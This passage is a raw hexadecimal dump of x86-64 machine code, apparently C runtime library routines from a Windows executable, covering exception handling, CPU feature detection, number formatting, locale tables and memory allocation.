e3cfffff488b80f000000048898424e0000000488b77504889b424d8000000488b47484889442448488b5f40488b473048894424584c8b77284c89742460e8a4cfffff4889b0f0000000e898cfffff488998f8000000e88ccfffff488b90f0000000488b5228488d4c2478e8a3beffff4c8be048894424384c397f58741fc78424d000000001000000e859cfffff488b883801000048898c24e800000041b800010000498bd6488b4c2458e81f330000488bd84889442440488bbc24e0000000eb7bc744242001000000e818cfffff83a06004000000488bb424d800000083bc24d0000000007421b201488bcee805f2ffff488b8424e80000004c8d4820448b40188b50048b08eb0d4c8d4e20448b46188b56048b0eff15eb920000448b7c2420488b5c24404c8b6c2450488bbc24e00000004c8b7424604c8b642438498bcce812beffff4585ff7532813e63736de0752a837e180475248b46202d2005931983f8027717488b4e28e879beffff85c0740ab201488bcee87bf1ffffe866ceffff4889b8f0000000e85aceffff4c89a8f8000000488b4424484863481c498b0648c70401feffffff488bc34881c490000000415f415e415d415c5f5e5bc3cc4883ec28488b018138524343e0741281384d4f43e0740a813863736de0751beb20e802ceffff83b800010000007e0be8f4cdffffff880001000033c04883c428c3e8e2cdffff83a00001000000e83a060000cccc488bc4448948204c894018488950104889480853565741544155415641574883ec30458be1498bf04c8bea4c8bf9e871bdffff48894424284c8bc6498bd5498bcfe8a20400008bf8e887cdffffff800001000083ffff0f84ed000000413bfc0f8ee400000083ffff7e053b7e047c05e8a40500004c63f7e828bdffff48634e084a8d04f08b3c01897c2420e814bdffff48634e084a8d04f0837c010400741ce800bdffff48634e084a8d04f048635c0104e8eebcffff4803c3eb0233c04885c0745e448bcf4c8bc6498bd5498bcfe869040000e8ccbcffff48634e084a8d04f0837c010400741ce8b8bcffff48634e084a8d04f048635c0104e8a6bcffff4803c3eb0233c041b803010000498bd7488bc8e8a6300000488b4c2428e8e8bcffffeb1e448ba42488000000488bb424800000004c8b6c24784c8b7c24708b7c2420897c2424e90affffffe886ccffff83b800010000007e0be878ccffffff880001000083ffff740a413bfc7e05e8a7040000448bcf4c8bc6498bd5498bcfe8ba0300004883c430415f415e415d415c5f5e5bc3cccc48895c240848896c2410488974241857415441564883ec40498be94d8bf0488bf2488bd9e817ccffff488bbc248000000083b86004000000baffffff1f41b82900008041b92600008041bc010000007538813b63736de074304439037510837b180f750a48817b6020059319741b44390b74168b0f23ca81f922059319720a448467240f857f0100008b4304a8660f8492000000837f04000f846a01000083bc2488000000000f855c01000083e020743e44390b75394d8b86f8000000488bd5488bcfe8300300008bd883f8ff7c053b47047c05e8ab030000448bcb488bce488bd54c8bc7e882fdffffe91901000085c07420443903751b8b733883feff7c053b77047c05e87a030000488b4b28448bceebcc4c8bc7488bd5488bcee8bfb8ffffe9e2000000837f0c00752e8b0723c23d210593190f82cd000000837f2000740ee8cabaffff48634f204803c1eb0233c04885c00f84ae000000813b63736de0756d837b18037267817b2022059319765e488b4330837808007412e8a8baffff488b4b304c6351084c03d0eb034533d24d85d2743a0fb68424980000004c8bcd4d8bc689442438488b842490000000488bd648894424308b842488000000488bcb8944242848897c242041ffd2eb3c488b8424900000004c8bcd4d8bc648894424388b842488000000488bd6894424308a842498000000488bcb8844242848897c2420e8eceeffff418bc4488b5c2460488b6c2468488b7424704883c440415e415c5fc3488bc44889580848896810488970184889782041564883ec208b710433db4d8bf0488bea488bf985f6740e4863f6e8b9b9ffff488d0c06eb03488bcb4885c90f84c800000085f6740f48637704e89ab9ffff488d0c06eb03488bcb3859100f84a9000000f60780740af64500100f859a00000085f67411e870b9ffff488bf0486347044803f0eb03488bf3e874b9ffff488bc8486345044803c8483bf1743a395f047411e843b9ffff488bf0486347044803f0eb03488bf3e847b9ffff48635504488d4e104883c2104803d0e88302000085c0740433c0eb39b0028445007405f60708742441f606017405f60701741941f606047405f60704740e418406740484077405bb010000008bc3eb05b801000000488b5c2430488b6c2438488b742440488b7c24484883c420415ec3cccccc4883ec284d63481c488b014d8bd0418b040183f8fe750b4c8b02498bcae8820000004883c428c3cc40534883ec204c8d4c2440498bd8e859b4ffff488b084863431c48894c24408b4408044883c4205bc3cccccc4963501c488b0144890c02c348895c2408574883ec20418bf94c8d4c2440498bd8e81ab4ffff488b084863431c48894c24403b7c08047e04897c0804488b5c24304883c4205fc3cc4c8b02e90000000048895c240848896c24104889742418574883ec20498be8488bf2488bd94885c97505e865000000486343188b7b14480346087505e8530000004533c085ff74344c8b4e084c6353184b8d0cc14a6314114903d1483bea7c0841ffc0443bc772e84585c0740f418d48ff498d04c9428b441004eb0383c8ff488b5c2430488b6c2438488b7424404883c4205fc34883ec28488b0d11750100ff159b8b00004885c07404ffd0eb00e801000000904883ec28e893c7ffff488b88d00000004885c97404ffd1eb00e8ae2b000090cc4883ec28488d0dd5ffffffff15538b0000488905c47401004883c428c3cccccc4883ec284d8b4138488bca498bd1e80d000000b8010000004883c428c3cccccc40534883ec20458b18488bda4c8bc94183e3f841f600044c8bd17413418b40084d635004f7d84c03d14863c84c23d14963c34a8b1410488b43108b480848034b08f641030f740c0fb6410383e0f048984c03c84c33ca498bc94883c4205be991abffffcccccccccccccc66660f1f840000000000482bd1f6c10774140fb6013a0411754f48ffc184c07445f6c10775ec49bb808080808080808049bafffefefefefefefe678d041125ff0f00003df80f000077c8488b01483b041175bf4d8d0c0248f7d04883c1084923c14985c374d433c0c3481bc04883c801c3cc40534883ec30488bd9b90e000000e83d10000090488b43084885c0743f488b0dac730100488d159d73010048894c24204885c97419483901750f488b410848894208e8c9b0ffffeb05488bd1ebdd488b4b08e8b9b0ffff4883630800b90e000000e8da1100004883c4305bc348895c240848896c24104889742418574883ec1033c933c033ff0fa2c7054a0b010002000000c7053c0b010001000000448bdb8bd9448bc281f36e74656c448bca418bd34181f0696e654981f247656e758be8440bc38d4701440bc2410f94c24181f3417574684181f1656e7469450bd981f163414d44440bd9400f94c633c90fa2448bd9448bc8895c24048954240c4584d2744f8bd081e2f03fff0f81fac0060100742b81fa60060200742381fa70060200741b81c2b0f9fcff83fa20772448b90100010001000000480fa3d17314448b05957201004183c8014489058a720100eb07448b05817201004084f6741b4181e1000ff00f4181f9000f60007c0b4183c80444890561720100b8070000003be87c2233c90fa28bfb890424894c24088954240c0fbae309730b4183c80244890536720100410fbae3147350c705250a010002000000c7051f0a010006000000410fbae31b7335410fbae31c732ec705030a010003000000c705fd0901000e00000040f6c7207414c705e909010005000000c705e30901002e000000488b5c2420488b6c2428488b74243033c04883c4105fc340534883ec20488bd9c64118004885d20f8582000000e835c4ffff48894310488b90c0000000488913488b88b800000048894b08483b15fd0e010074168b80c80000008505631901007508e8c0120000488903488b057e15010048394308741b488b43108b88c8000000850d3c1901007509e89116000048894308488b4b108b81c8000000a802751683c8028981c8000000c6431801eb070f1002f30f7f01488bc34883c4205bc34883ec488b442478488364243000894424288b44247089442420e8050000004883c448c34883ec38418d41bb41badfffffff4185c2744a4183f9667516488b442470448b4c24604889442420e85b080000eb4a418d41bf448b4c24604185c2488b44247048894424288b442468894424207407e808090000eb23e825000000eb1c488b442470448b4c246048894424288b44246889442420e8b30500004883c438c3cccc488bc44889580848896810488970185741544155415641574883ec50488bfa488b9424a80000004c8bf1488d48b841bf30000000418bd9498bf041bcff030000410fb7efe86bfeffff4533c985db410f48d94885ff750ce80cbdffffbb16000000eb1d4885f674ef8d430b44880f4863c8483bf17719e8edbcffffbb220000008918e815bcffff4533c9e9ee020000498b06b9ff07000048c1e8344823c1483bc10f85920000004c894c242844894c24204c8d46fe4883feff488d5702448bcb4c0f44c6498bcee8e00400004533c98bd885c0740844880fe9a0020000807f022dbe010000007506c6072d4803fe8b9c24a000000044883fba650000008bc3f7d81ac980e1e080c178880c37488d4e014803cfe8642800004533c94885c00f8456020000f7db1ac980e1e080c170880844884803e94102000048b80000000000000080be010000004985067406c6072d4803fe448bac24a0000000458bd749bbffffffffffff0f004488174803fe418bc5f7d8418bc51ac980e1e080c178880f4803fef7d81bd248b8000000000000f07f83e2e083ead9498506751b448817498b064803fe4923c348f7d84d1be44181e4fe030000eb06c607314803fe4c8bff4803fe85db750545880feb14488b442430488b88f0000000488b018a0841880f4d851e0f868800000049b80000000000000f0085db7e2d498b06408acd4923c04923c348d3e8664103c26683f83976036603c2880749c1e8042bde4803fe6683c5fc79cf6685ed7848498b06408acd4923c04923c348d3e86683f8087633488d4fff8a012c46a8df7508448811482bceebf0493bcf74148a013c39750780c23a8811eb0d4002c68801eb06482bce40003185db7e184c8bc3418ad2488bcfe8d9b4ffff4803fb4533c9458d513045380f490f44ff41f7dd1ac024e004708807498b0e4803fe48c1e93481e1ff070000492bcc7808c6072b4803feeb09c6072d4803fe48f7d94c8bc74488174881f9e80300007c3348b8cff753e3a59bc42048f7e948c1fa07488bc248c1e83f4803d0418d041288074803fe4869c218fcffff4803c8493bf875064883f9647c2e48b80bd7a3703d0ad7a348f7e94803d148c1fa06488bc248c1e83f4803d0418d041288074803fe486bc29c4803c8493bf875064883f90a7c2b48b8676666666666666648f7e948c1fa02488bc248c1e83f4803d0418d041288074803fe486bc2f64803c84102ca880f44884f01418bd944384c2448740c488b4c244083a1c8000000fd4c8d5c24508bc3498b5b30498b6b38498b7340498be3415f415e415d415c5fc3488bc4488958084889681048897018488978204155415641574883ec504c8bf2488b9424a0000000488bf9488d48c8458be94963f0e8cafaffff4885ff74054d85f6750ce86fb9ffffbb16000000eb1b33c085f60f4fc683c00948984c3bf07716e852b9ffffbb220000008918e87ab8ffffe93801000080bc249800000000488bac2490000000743433db837d002d0f94c34533ff4803df85f6410f9fc74585ff741a488bcbe8f10700004963cf488bd34c8d40014803cbe83fdcffff837d002d488bd77507c6072d488d570185f67e1b8a42018802488b44243048ffc2488b88f0000000488b018a08880a33c9488d1c324c8d0533960000388c24980000000f94c14803d9482bfb4983feff488bcb498d143e490f44d6e80b07000085c00f85be000000488d4b024585ed7403c60345488b45108038307456448b450441ffc8790741f7d8c643012d4183f8647c1bb81f85eb5141f7e8c1fa058bc2c1e81f03d00053026bc29c4403c04183f80a7c1bb86766666641f7e8c1fa028bc2c1e81f03d00053036bc2f64403c044004304f605856e0100017414803930750f488d510141b803000000e84fdbffff33db807c244800740c488b4c244083a1c8000000fd4c8d5c24508bc3498b5b20498b6b28498b7330498b7b38498be3415f415e415dc34883642420004533c94533c033d233c9e814b7ffffcccccccc40535556574881ec88000000488b05bd0001004833c44889442470488b09498bd8488bfa418bf1bd160000004c8d442458488d542440448bcde8122800004885ff7513e874b7ffff8928e8a1b6ffff8bc5e9880000004885db74e84883caff483bda741a33c0837c24402d488bd30f94c0482bd033c085f60f9fc0482bd033c0837c24402d448d46010f94c033c985f60f9fc14803c74c8d4c24404803c8e87124000085c07405c60700eb32488b8424d8000000448b8c24d0000000448bc64889442430488d442440488bd3488bcfc6442428004889442420e826fdffff488b4c24704833cce825a1ffff4881c4880000005f5e5d5bc3cc488bc44889580848896810488970184889782041564883ec40418b5904488bf2488b542478488bf9488d48d8498be9ffcb458bf0e8d7f7ffff4885ff74054885f67516e87cb6ffffbb160000008918e8a4b5ffffe9d8000000807c247000741a413bde751533c0837d002d4863cb0f94c04803c766c704013000837d002d7506c6072d48ffc7837d04007f20488bcfe814050000488d4f01488bd74c8d4001e864d9ffffc6073048ffc7eb07486345044803f84585f67e77488bcf488d7701e8e4040000488bd7488bce4c8d4001e835d9ffff488b442420488b88f0000000488b018a08880f8b5d0485db7942f7db807c247000750b8bc3418bde443bf00f4dd885db741a488bcee89b0400004863cb488bd64c8d40014803cee8e9d8ffff4c63c3ba30000000488bcee889afffff33db807c243800740c488b4c243083a1c8000000fd488b6c2458488b742460488b7c24688bc3488b5c24504883c440415ec3cccccc40535556574883ec78488b0564fe00004833c44889442460488b09498bd8488bfa418bf1bd160000004c8d442448488d542430448bcde8b92500004885ff7510e81bb5ffff8928e848b4ffff8bc5eb6b4885db74eb4883caff483bda741033c0837c24302d488bd30f94c0482bd0448b44243433c94c8d4c24304403c6837c24302d0f94c14803cfe82b22000085c07405c60700eb25488b8424c00000004c8d4c2430448bc64889442428488bd3488bcfc644242000e8e1fdffff488b4c24604833cce8ec9effff4883c4785f5e5d5bc3cccccc405355565741564881ec80000000488b058bfd00004833c44889442470488b09498bf8488bf2418be9bb160000004c8d442458488d542440448bcbe8e02400004885f67513e842b4ffff8918e86fb3ffff8bc3e9c10000004885ff74e8448b74244433c041ffce837c24402d0f94c04883caff488d1c30483bfa7406488bd7482bd04c8d4c2440448bc5488bcbe85221000085c07405c60600eb7e8b442444ffc8443bf00f9cc183f8fc7c3b3bc57d3784c9740c8a0348ffc384c075f78843fe488b8424d80000004c8d4c2440448bc54889442428488bd7488bcec644242001e8e3fcffffeb32488b8424d8000000448b8c24d0000000448bc54889442430488d442440488bd7488bcec6442428014889442420e8bbf9ffff488b4c24704833cce8ba9dffff4881c480000000415e5f5e5d5bc333d2e901000000cc40534883ec40488bd9488d4c2420e889f4ffff8a0b4c8b44242084c97419498b80f0000000488b108a023ac8740948ffc38a0b84c975f38a0348ffc384c0743deb092c45a8df740948ffc38a0384c075f1488bd348ffcb803b3074f8498b80f0000000488b088a013803750348ffcb8a0248ffc348ffc2880384c075f2807c243800740c488b44243083a0c8000000fd4883c4405bc3cccc4533c9e90000000040534883ec30498bc0488bda4d8bc1488bd085c97414488d4c2420e884210000488b442420488903eb10488d4c2440e8382200008b44244089034883c4305bc333d2e901000000cc40534883ec40488bd9488d4c2420e8a1f3ffff0fbe0be8411e000083f865740f48ffc30fb60be8611c000085c075f10fbe0be8251e000083f87875044883c302488b4424208a13488b88f0000000488b018a08880b48ffc38a0388138ad08a0348ffc384c075f138442438740c488b44243083a0c8000000fd4883c4405bc3ccf20f100133c0660f2f05568f00000f93c0c3cccc48895c2408574883ec2033ff488d1de5fc0000488b0bff153c7b0000ffc74889034863c7488d5b084883f80a72e5488b5c24304883c4205fc3cccccc83254578010000c340534883ec204885c9740d4885d274084d85c0751c448801e873b1ffffbb160000008918e89bb0ffff8bc34883c4205bc34c8bc94d2bc8418a004388040149ffc084c0740548ffca75ed4885d2750e8811e83ab1ffffbb22000000ebc533c0ebcacccccccccccccccccc66660f1f840000000000488bc148f7d948a907000000740f66908a1048ffc084d2745fa80775f349b8fffefefefefefe7e49bb0001010101010181488b104d8bc84883c0084c03ca48f7d24933d14923d374e8488b50f884d2745184f6744748c1ea1084d2743984f6742f48c1ea1084d2742184f67417c1ea1084d2740a84f675b9488d4401ffc3488d4401fec3488d4401fdc3488d4401fcc3488d4401fbc3488d4401fac3488d4401f9c3488d4401f8c348895c2408574883ec204863d9488d3dd4fb00004803db48833cdf007511e8a900000085c075088d4811e895b9ffff488b0cdf488b5c24304883c4205f48ff25fc7a000048895c240848896c24104889742418574883ec20bf24000000488d1d84fb00008bef488b334885f6741b837b08017415488bceff15037a0000488bcee83ba0ffff488323004883c31048ffcd75d4488d1d57fb0000488b4bf84885c9740b833b017506ff15d37900004883c31048ffcf75e3488b5c2430488b6c2438488b7424404883c4205fc3cc48895c240848897c241041564883ec204863d948833d21590100007519e8cacfffffb91e000000e834d0ffffb9ff000000e862b7ffff4803db4c8d35dcfa000049833cde007407b801000000eb5eb928000000e804ccffff488bf84885c0750fe843afffffc7000c00000033c0eb3db90a000000e8bbfeffff90488bcf49833cde0075134533c0baa00f0000e88fc6ffff49893cdeeb06e8589fffff90488b0d18fb0000ff15d2790000eb9b488b5c2430488b7c24384883c420415ec3cccccc48895c24084889742410574883ec2033f6488d1d44fa00008d7e24837b080175244863c6488d15e16101004533c0488d0c80ffc6488d0ccabaa00f000048890be81bc6ffff4883c31048ffcf75cd488b5c2430488b7424388d47014883c4205fc3cccccc4863c9488d05eef900004803c9488b0cc848ff2540790000f0ff01488b81d80000004885c07403f0ff00488b81e80000004885c07403f0ff00488b81e00000004885c07403f0ff00488b81f80000004885c07403f0ff00488d412841b806000000488d15d4fb0000483950f0740b488b104885d27403f0ff02488378e800740c488b50f84885d27403f0ff024883c02049ffc875cc488b8120010000f0ff805c010000c348895c240848896c24104889742418574883ec20488b81f0000000488bd94885c07479488d0dba080100483bc1746d488b83d80000004885c07461833800755c488b8be80000004885c974168339007511e8d69dffff488b8bf0000000e8d61e0000488b8be00000004885c974168339007511e8b49dffff488b8bf0000000e8c01f0000488b8bd8000000e89c9dffff488b8bf0000000e8909dffff488b83f80000004885c074478338007542488b8b000100004881e9fe000000e86c9dffff488b8b10010000bf80000000482bcfe8589dffff488b8b18010000482bcfe8499dffff488b8bf8000000e83d9dffff488b8b20010000488d05a7fa0000483bc8741a83b95c010000007511e8a01f0000488b8b20010000e8109dffff488db328010000488d7b28bd06000000488d0565fa0000483947f0741a488b0f4885c97412833900750de8e19cffff488b0ee8d99cffff48837fe8007413488b4ff84885c9740a8339007505e8bf9cffff4883c6084883c72048ffcd75b2488bcb488b5c2430488b6c2438488b7424404883c4205fe9969cffffcccc4885c90f84970000004183c9fff0440109488b81d80000004885c07404f0440108488b81e80000004885c07404f0440108488b81e00000004885c07404f0440108488b81f80000004885c07404f0440108488d412841b806000000488d159ef90000483950f0740c488b104885d27404f044010a488378e800740d488b50f84885d27404f044010a4883c02049ffc875ca488b8120010000f04401885c010000488bc1c340534883ec20e835b1ffff488bd88b0d880601008588c800000074184883b8c000000000740ee815b1ffff488b98c0000000eb2bb90c000000e8f2faffff90488d8bc0000000488b15dbfb0000e826000000488bd8b90c000000e8c1fcffff4885db75088d4b20e888b4ffff488bc34883c4205bc3cccccc48895c2408574883ec20488bfa4885d274434885c9743e488b19483bda7431488911488bcae896fcffff4885db7421488bcbe8adfeffff833b007514488d057dfb0000483bd87408488bcbe8fcfcffff488bc7eb0233c0488b5c24304883c4205fc3cccc4883ec28833db9720100007514b9fdffffffe8c1030000c705a37201000100000033c04883c428c340534883ec408bd9488d4c242033d2e8d8ebffff8325f95f01000083fbfe7512c705ea5f010001000000ff155c750000eb1583fbfd7514c705d35f010001000000ff153d7500008bd8eb1783fbfc7512488b442420c705b55f0100010000008b5804807c243800740c488b4c243083a1c8000000fd8bc34883c4405bc3cccccc48895c240848896c24104889742418574883ec20488d5918488bf1bd01010000488bcb448bc533d2e8e7a3ffff33c0488d7e0c4889460448898620020000b9060000000fb7c066f3ab488d3dd4fd0000482bfe8a041f880348ffc348ffcd75f3488d8e19010000ba000100008a0439880148ffc148ffca75f3488b5c2430488b6c2438488b7424404883c4205fc3cccc48895c241048897c241855488dac2480fbffff4881ec80050000488b0583f200004833c448898570040000488bf98b4904488d542450ff1548740000bb0001000085c00f843501000033c0488d4c24708801ffc048ffc13bc372f58a442456c644247020488d542456eb22440fb642010fb6c8eb0d3bcb730e8bc1c6440c7020ffc1413bc876ee4883c2028a0284c075da8b470483642430004c8d44247089442428488d8570020000448bcbba0100000033c94889442420e89b24000083642440008b4704488b972002000089442438488d4570895c243048894424284c8d4c2470448bc333c9895c2420e85822000083642440008b4704488b972002000089442438488d8570010000895c243048894424284c8d4c247041b80002000033c9895c2420e81f2200004c8d45704c8d8d700100004c2bc7488d9570020000488d4f194c2bcff60201740a800910418a4408e7eb0df602027410800920418a4409e7888100010000eb07c681000100000048ffc14883c20248ffcb75c9eb3f33d2488d4f19448d429f418d402083f81977088009108d4220eb0c4183f819770e8009208d42e0888100010000eb07c6810001000000ffc248ffc13bd372c7488b8d700400004833cce81892ffff4c8d9c2480050000498b5b18498b7b20498be35dc3cccccc48895c2410574883ec20e839adffff488bf88b0d8c0201008588c800000074134883b8c0000000007409488b98b8000000eb6cb90d000000e8fbf6ffff90488b9fb800000048895c2430483b1d7ffe000074424885db741bf0ff0b7516488d054cfb0000488b4c2430483bc87405e88597ffff488b0556fe0000488987b8000000488b0548fe00004889442430f0ff00488b5c2430b90d000000e889f8ffff4885db75088d4b20e850b0ffff488bc3488b5c24384883c4205fc3cccc488bc44889580848897010488978184c89702041574883ec308bf94183cfffe868acffff488bf0e818ffffff488b9eb80000008bcfe816fcffff448bf03b43040f84db010000b928020000e854c3ffff488bd833ff4885c00f84c8010000488b86b8000000488bcb8d5704448d427c0f10000f11010f1048100f1149100f1040200f1141200f1048300f1149300f1040400f1141400f1048500f1149500f1040600f1141604903c80f1048700f1149f04903c048ffca75b70f10000f11010f1048100f114910488b402048894120893b488bd3418bcee869010000448bf885c00f8515010000488b8eb80000004c8d3500fa0000f0ff097511488b8eb8000000493bce7405e83296ffff48899eb8000000f0ff03f686c8000000020f8505010000f605c0000100010f85f8000000be0d0000008bcee842f5ffff908b43048905005b01008b43088905fb5a0100488b8320020000488905015b01008bd74c8d05806effff8954242083fa057d154863ca0fb7444b0c664189844868ec0100ffc2ebe28bd78954242081fa010100007d134863ca8a4419184288840100890100ffc2ebe1897c242081ff000100007d164863cf8a84191901000042888401108a0100ffc7ebde488b0d48fc000083c8fff00fc101ffc87511488b0d36fc0000493bce7405e85495ffff48891d25fc0000f0ff038bcee873f6ffffeb2b83f8ff75264c8d35edf80000493bde7408488bcbe82895ffffe8d7a4ffffc70016000000eb0533ff448bff418bc7488b5c2440488b742448488b7c24504c8b7424584883c430415fc348895c241848896c242056574154415641574883ec40488b05a3ed00004833c44889442438488bdae8dff9ffff33f68bf885c0750d488bcbe84ffaffffe9440200004c8d2597fa00008bee41bf01000000498bc439380f84380100004103ef4883c03083fd0572ec8d871802ffff413bc70f86150100000fb7cfff15086f000085c00f8404010000488d5424208bcfff150b6f000085c00f84e3000000488d4b1833d241b801010000e8f29dffff897b044889b32002000044397c24200f86a6000000488d542426403874242674394038720174330fb67a01440fb602443bc7771d418d4801488d43184803c1412bf8418d0c3f8008044903c7492bcf75f54883c20240383275c7488d431ab9fe0000008008084903c7492bcf75f58b4b0481e9a4030000742e83e904742083e90d7412ffc97405488bc6eb22488b05c7840000eb19488b05b6840000eb10488b05a5840000eb07488b05948400004889832002000044897b08eb03897308488d7b0c0fb7c6b90600000066f3abe9fe00000039359a5801000f85a9feffff83c8ffe9f4000000488d4b1833d241b801010000e8fb9cffff8bc54d8d4c24104c8d1c404c8d3521f90000bd0400000049c1e3044d03cb498bd1413831744040387201743a440fb6020fb64201443bc07724458d50014181fa010100007317418a064503c74108441a180fb642014503d7443bc076e04883c20240383275c04983c1084d03f7492bef75ac897b0444897b0881efa4030000742983ef04741b83ef0d740dffcf7522488b35cd830000eb19488b35bc830000eb10488b35ab830000eb07488b359a8300004c2bdb4889b320020000488d4b0c4b8d3c23ba060000000fb7440ff8668901488d4902492bd775ef488bcbe896f8ffff33c0488b4c24384833cce86b8cffff4c8d5c2440498b5b40498b6b48498be3415f415e415c5f5ec3cccc4c63413c4533c94c8bd24c03c1410fb74014450fb758064883c0184903c04585db741e8b500c4c3bd2720a8b480803ca4c3bd1720e41ffc14883c028453bcb72e233c0c3cccccccccccccccccccccccc48895c2408574883ec20488bd9488d3d8c6affff488bcfe83400000085c07422482bdf488bd3488bcfe882ffffff4885c0740f8b4024c1e81ff7d083e001eb0233c0488b5c24304883c4205fc3cccccc488bc1b94d5a0000663908740333c0c34863483c4803c833c0813950450000750cba0b020000663951180f94c0c3cccc48890da1560100c3488b0db156010048ff25a26a0000cccc48890d9156010048890d9256010048890d9356010048890d94560100c3cccccc48895c241848897424205741544155415641574883ec308bd94533ed44216c246833ff897c246033f68bd183ea020f84c400000083ea02746283ea02744d83ea02745883ea03745383ea04742e83ea067416ffca7435e899a0ffffc70016000000e8c29fffffeb404c8d3511560100488b0d0a560100e98b0000004c8d350e560100488b0d07560100eb7b4c8d35f6550100488b0def550100eb6be814a6ffff488bf04885c0750883c8ffe96b010000488b90a0000000488bca4c6305a76e000039590474134883c110498bc048c1e0044803c2483bc872e8498bc048c1e0044803c2483bc87305395904740233c94c8d71084d8b3eeb204c8d3579550100488b0d72550100bf01000000897c2460ff156b6900004c8bf84983ff01750733c0e9f60000004d85ff750a418d4f03e8e1a9ffffcc85ff740833c9e841efffff9041bc1009000083fb0b7733410fa3dc732d4c8baea80000004c896c24284883a6a80000000083fb0875528b86b000000089442468c786b00000008c00000083fb0875398b0de76d00008bd1894c24208b05df6d000003c83bd17d2c4863ca4803c9488b86a0000000488364c80800ffc2895424208b0db66d0000ebd333c9ff15b468000049890685ff740733c9e89ef0ffff83fb08750d8b96b00000008bcb41ffd7eb058bcb41ffd783fb0b0f872cffffff410fa3dc0f8322ffffff4c89aea800000083fb080f8512ffffff8b4424688986b0000000e903ffffff488b5c2470488b7424784883c430415f415e415d415c5fc3cc48890d65540100c3cccccccccccccccccccccccccccccccccccc66660f1f8400000000004881ecd80400004d33c04d33c948896424204c89442428e8945300004881c4d8040000c3cccccccccccc660f1f44000048894c24084889542418448944241049c7c120059319eb08cccccccccccc6690c3cccccccccccc660f1f840000000000c3cccccc48895c2408574883ec208b05c454010033dbbf1400000085c07507b800020000eb053bc70f4cc74863c8ba0800000089059f540100e832baffff4889058b5401004885c075248d5008488bcf893d82540100e815baffff4889056e5401004885c07507b81a000000eb23488d0dfbf4000048890c034883c130488d5b0848ffcf7409488b0543540100ebe633c0488b5c24304883c4205fc34883ec28e8d31c0000803d08470100007405e8b91d0000488b0d16540100e8c98dffff48832509540100004883c428c340534883ec20488bd9488d0d94f40000483bd97240488d0518f80000483bd87734488bd348b8abaaaaaaaaaaaa2a482bd148f7ea48c1fa03488bca48c1e93f4803ca83c110e8b2ecffff0fba6b180f4883c4205bc3488d4b304883c4205b48ff25d7670000cccccc40534883ec20488bda83f9147d1383c110e87eecffff0fba6b180f4883c4205bc3488d4a304883c4205b48ff25a3670000cccccc488d1501f40000483bca7237488d0585f70000483bc8772b0fba71180f482bca48b8abaaaaaaaaaaaa2a48f7e948c1fa03488bca48c1e93f4803ca83c110e90deeffff4883c13048ff255a670000cccc83f9147d0d0fba72180f83c110e9eeedffff488d4a3048ff253b670000cccccc48895c24084889742410574883ec408bda488bd1488d4c2420418bf9418bf0e88cddffff488b4424280fb6d340847c0219751e85f67414488b442420488b88080100000fb7045123c6eb0233c085c07405b801000000807c243800740c488b4c243083a1c8000000fd488b5c2450488b7424584883c4405fc3cccccc8bd141b9040000004533c033c9e972ffffffcccc48895c24084889742410574883ec20488bda488bf94885c9750a488bcae83e8cffffeb6a4885d27507e8f28bffffeb5c4883fae07743488b0d2b450100b8010000004885db480f44d84c8bc733d24c8bcbff1581660000488bf04885c0756f39055b4e01007450488bcbe8759dffff85c0742b4883fbe076bd488bcbe8639dffffe84e9bffffc7000c00000033c0488b5c2430488b7424384883c4205fc3e8319bffff488bd8ff15746400008bc8e8419bffff8903ebd5e8189bffff488bd8ff155b6400008bc8e8289bffff8903488bc6ebbbcc48895c2408574883ec20498bf8488bda4885c9741d33d2488d42e048f7f1483bc3730fe8d89affffc7000c00000033c0eb5d480fafd9b8010000004885db480f44d833c04883fbe07718488b0d434401008d50084c8bc3ff153f6400004885c0752d833d834d0100007419488bcbe89d9cffff85c075cb4885ff74b2c7070c000000ebaa4885ff7406c7070c000000488b5c24304883c4205fc3cccc40534883ec204533d24c8bc94885c9740e4885d274094d85c0751d66448911e8409affffbb160000008918e86899ffff8bc34883c4205bc36644391174094883c10248ffca75f14885d2750666458911ebcd492bc8410fb70066428904014d8d40026685c0740548ffca75e94885d2751066458911e8ea99ffffbb22000000eba833c0ebadcccccc40534883ec204533d24885c9740e4885d274094d85c0751d66448911e8bb99ffffbb160000008918e8e398ffff8bc34883c4205bc34c8bc94d2bc8410fb70066438904014d8d40026685c0740548ffca75e94885d2751066448911e87c99ffffbb22000000ebbf33c0ebc4cc488bc10fb7104883c0026685d275f4482bc148d1f848ffc8c3cccccc4883ec2885c9782083f9027e0d83f90375168b05044f0100eb218b05fc4e0100890df64e0100eb13e82799ffffc70016000000e85098ffff83c8ff4883c428c340535556574154415641574883ec50488b0512e200004833c448894424484c8bf933c9418be84c8be2ff156962000033ff488bf0e87fb0ffff48393da04e0100448bf00f85f8000000488d0d687a000033d241b800080000ff15b2630000488bd84885c0752dff15f461000083f8570f85e0010000488d0d3c7a00004533c033d2ff1589630000488bd84885c00f84c2010000488d15367a0000488bcbff155d6200004885c00f84a9010000488bc8ff15e3610000488d15247a0000488bcb4889051a4e0100ff1534620000488bc8ff15c3610000488d15147a0000488bcb488905024e0100ff1514620000488bc8ff15a3610000488d150c7a0000488bcb488905ea4d0100ff15f4610000488bc8ff1583610000488905e44d01004885c07420488d15007a0000488bcbff15cf610000488bc8ff155e610000488905b74d0100ff159161000085c0741d4d85ff7409498bcfff15af6000004585f67426b804000000e9ef0000004585f67417488b0d6c4d0100ff1526610000b803000000e9d3000000488b0d6d4d0100483bce7463483935694d0100745aff1501610000488b0d5a4d0100488bd8ff15f16000004c8bf04885db743c4885c07437ffd34885c0742a488d4c243041b90c0000004c8d44243848894c2420418d51f5488bc841ffd685c07407f64424400175060fbaed15eb40488b0dee4c0100483bce7434ff159b6000004885c07429ffd0488bf84885c0741f488b0dd54c0100483bce7413ff157a6000004885c07408488bcfffd0488bf8488b0da64c0100ff15606000004885c07410448bcd4d8bc4498bd7488bcfffd0eb0233c0488b4c24484833cce80481ffff4883c450415f415e415c5f5e5d5bc3cc48f7d91bc083e001c3cccccccccccccccccccccccccccccccccc66660f1f8400000000004883ec2848894c243048895424384489442440488b12488bc1e8f2f7ffffffd0e81bf8ffff488bc8488b542438488b1241b802000000e8d5f7ffff4883c428c3488b0424488901c34883ec28e807f5ffff4885c0740ab916000000e828f5fffff60509f10000027429b917000000e8234b000085c07407b907000000cd2941b801000000ba15000040418d4802e8ba93ffffb903000000e800a0ffffcccccccc40534883ec40833d4b4c0100004863d97510488b055fe700000fb7045883e004eb52488d4c242033d2e8fad6ffff488b44242083b8d4000000017e154c8d442420ba040000008bcbe8671600008bc8eb0e488b80080100000fb70c5883e104807c243800740c488b44243083a0c8000000fd8bc14883c4405bc3cccc48897c24104c8974242055488bec4883ec704863f9488d4de0e88ed6ffff81ff00010000735d488b55e083bad4000000017